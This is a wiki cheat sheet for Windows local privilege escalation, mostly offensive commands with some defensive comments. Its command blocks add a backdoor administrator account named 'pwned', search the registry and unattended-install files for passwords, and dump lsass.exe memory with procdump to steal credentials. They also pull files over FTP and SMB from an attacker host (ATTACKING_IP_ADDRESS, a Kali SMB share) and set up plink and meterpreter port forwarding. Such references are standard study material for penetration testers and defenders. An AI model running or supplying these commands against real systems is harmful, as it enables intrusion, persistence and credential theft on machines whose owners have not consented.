
Windows Privilege Escalation

Jakob Pennington edited this page Feb 27, 2019 · 6 revisions

Common Windows LPE Vectors

  • Hot Potato
  • Kernel Exploits
  • Password Mining - Configuration Files
  • Password Mining - Memory
  • Password Mining - Registry
  • Registry - AlwaysInstallElevated
  • Registry - AutoRun
  • Scheduled Tasks - Missing Binary
  • Services - binpath
  • Services - DLL Hijacking
  • Services - Executable File
  • Services - Registry
  • Services - Unquoted Path
  • Startup Applications

System Enumeration

# System information (OS build, architecture, domain membership)
systeminfo
hostname

# Current user name
whoami
echo %username%

# Environment variables (paths, proxy settings and tool locations show up here)
set

# Firewall - legacy 'netsh firewall' context; the Networking section below also
# covers the newer 'netsh advfirewall' context
netsh firewall show state
netsh firewall show config

# Network
netstat -ano
ipconfig /all
route print
# NOTE(review): the Networking section uses 'arp -a'; confirm which flag spelling your arp build accepts
arp -A

# Connected drives (mapped network shares and local volumes)
net use
wmic logicaldisk get caption,description,providername

# System patches - installed hotfixes, to compare against the build reported by systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

# AlwaysInstallElevated - when the value is 1 under BOTH keys, Windows Installer
# runs MSI packages with elevated rights; defenders should keep this policy disabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Users

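# Current user - token privileges and account details
whoami /priv
net users USER_NAME

# List users
net users
dir /b /ad "C:\Users\\"
dir /b /ad "C:\Documents and Settings\\" # Windows XP and below
qwinsta

# List groups - 'net localgroup' (singular); 'net localgroups' is not a valid subcommand
net localgroup
whoami /groups

# List domain groups
net group /domain
net group /domain GROUP_NAME

# List administrators
net localgroup Administrators

# Add a new user
# (with account-management auditing enabled this is logged as Security event 4720)
net user /add pwned pwned

# Add a user to a group
# (local group membership changes are logged as Security event 4732)
net localgroup administrators pwned /add
net localgroup "Remote Desktop Users" pwned /add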

Files

# List files, with file / folder owner (/q adds the owner column)
dir /q FILE_NAME

# List the permissions (ACL) of a file
cacls FILE_NAME     # <= Windows XP (deprecated tool)
icacls FILE_NAME    # > Windows XP

Credentials

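# Credential manager - stored credentials and the vault files that back them
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

# If there are cached admin creds (shown by cmdkey /list), /savecred reuses them without a prompt
runas /user:"Administrator" /savecred "cmd /C COMMAND"

# Credentials in registry
# Winlogon autologon values - DefaultPassword is stored in clear text when autologon is configured
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP service key lives under CurrentControlSet (one token), matching the Networking section
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for credentials in registry (/f search string, /t value type, /s recurse - slow on large hives)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Files with credentials - unattended-install answer files (paths to inspect, not commands)
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

# Or, just search (2>nul discards "File Not Found" noise)
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

# Search in files (/s recurse into subdirectories, /i case-insensitive)
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
dir C:\*vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

# System files - SAM and SYSTEM hive copies (paths to check, not commands).
# A backup copy readable by a standard user is a finding to remediate.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system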

Software

# Installed programs
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

# Permissions - FULL control granted to Everyone / BUILTIN\Users on a program directory.
# Any hit is a misconfiguration: a standard user could replace a binary that later runs
# with higher rights. Remediate by tightening the directory ACL.
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

# Permissions - Modify (same concern as above, one ACE weaker than full control)
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

# Permissions - Write, via Sysinternals accesschk
# (-q quiet banner, -w write access only, -s recurse, -u suppress errors)
accesschk.exe /accepteula -qwsu "Everyone" *
accesschk.exe /accepteula -qwsu "Authenticated Users" *
accesschk.exe /accepteula -qwsu "Users" *

Services / Scheduled Tasks

# List services (tasklist /svc maps each PID to the services it hosts; sc query shows state)
tasklist /svc
tasklist /v
net start
sc query

# Weak service permissions - services whose configuration is writable by a
# low-privileged group (-c services, -w write, -q quiet, -v verbose, -u suppress errors).
# Any hit is a misconfiguration to remediate by fixing the service's security descriptor.
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

# Unquoted service paths - auto-start services outside C:\Windows whose binary
# path is not wrapped in quotes (the last findstr drops the already-quoted ones)
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
# " < Keeping the markdown interpreter happy

# Scheduled tasks (check the binary each task runs and who can write to it)
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

# Startup Programs - Run / RunOnce keys plus the all-users and per-user Startup folders
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Networking

# General network details
ipconfig /all
route print
arp -a
netstat -ano
# Static name overrides - a file to inspect, not a command
C:\WINDOWS\System32\drivers\etc\hosts

# Firewall status ('netsh firewall' is the legacy context, advfirewall the current one)
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"

# Other network config
# netsh dump prints the complete netsh configuration as a script
netsh dump
# SNMP service configuration (community strings and permitted managers sit under this key when the service is installed)
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Sensitive Information

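# Web server (IIS)
dir /a C:\inetpub\
dir /s web.config
# IIS site configuration - a file to inspect, not a command; may hold connection strings
C:\Windows\System32\inetsrv\config\applicationHost.config

# Web server logs ([YYMMDD] is the date part of the log file name)
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
dir /s access.log error.log

# Other config files - PHP, Apache and MySQL configuration (one dir call; the
# file list was previously broken across two lines by a line wrap)
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf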

Transfer Files

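# FTP - scripted transfer. The credentials sit in ftp.txt in clear text and FTP
# itself is unencrypted, so delete ftp.txt when done.
# Keep a space between "21" and ">": cmd would otherwise parse "1>" as a handle
# redirect and write "open ATTACKING_IP_ADDRESS 2" to the file.
echo open ATTACKING_IP_ADDRESS 21 > ftp.txt
echo USER ATTACKING USERNAME>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET FILENAME>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

# Impacket SMB Server
# Kali - set up the SMB server (share name KALI, exporting the current directory)
smbserver.py KALI "$(pwd)"                       # SMB1
smbserver.py KALI "$(pwd)" -smb2support          # SMB2
# Windows
dir \\IP_ADDRESS\KALI                           # List files / check connection
net use \\IP_ADDRESS\KALI                       # Mount the share
mklink /d  C:\Path\To\Folder \\IP_ADDRESS\Kali  # Create symlink to share
copy \\IP_ADDRESS\KALI\Filename .               # Copy file into current directory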

Other Random Tricks

# Port forwarding - plink: -R opens port 8080 on the SSH server and forwards it to
# 127.0.0.1:8080 on this host. -pw places the password on the command line, where it
# is visible to every local user in the process list and in shell history.
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forwarding - meterpreter (-l local listener port, -p remote port, -r remote host)
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101

Privesc Guides

Windows Privilege Escalation Fundamentals - Fuzzy Security

Windows Privilege Escalation Guide - absolomb

Windows / Linux Local Privilege Escalation Workshop - sagishahar

Transferring Files from Kali to Windows - ropnop

Tools

Microsoft Sysinternals

accesschk.exe (run with the /accepteula flag) - a Sysinternals tool that checks permissions on files, directories, registry keys and services.

PsTools - Another set of Sysinternals tools, including PsExec to execute processes over SMB. Alternatively, mount the live Sysinternals share to avoid having to copy the tools over and remove them afterwards.

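# Map the live Sysinternals share as Z: (served over WebDAV, so the WebClient
# service must be running). The host name is plain - no "http://" or stray space.
net use Z: \\live.sysinternals.com\tools "/user:"
dir Z:
# Full memory dump (-ma) of lsass.exe to the file lsassdmp. LSA protection and
# Credential Guard block this on hardened hosts, and it is a high-signal EDR detection.
Z:\procdump -accepteula -ma lsass.exe lsassdmp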

Some tips on Windows Privilege Escalation

  • Try running commands on your own machine first to test syntax - it can be far easier than trying to debug remotely.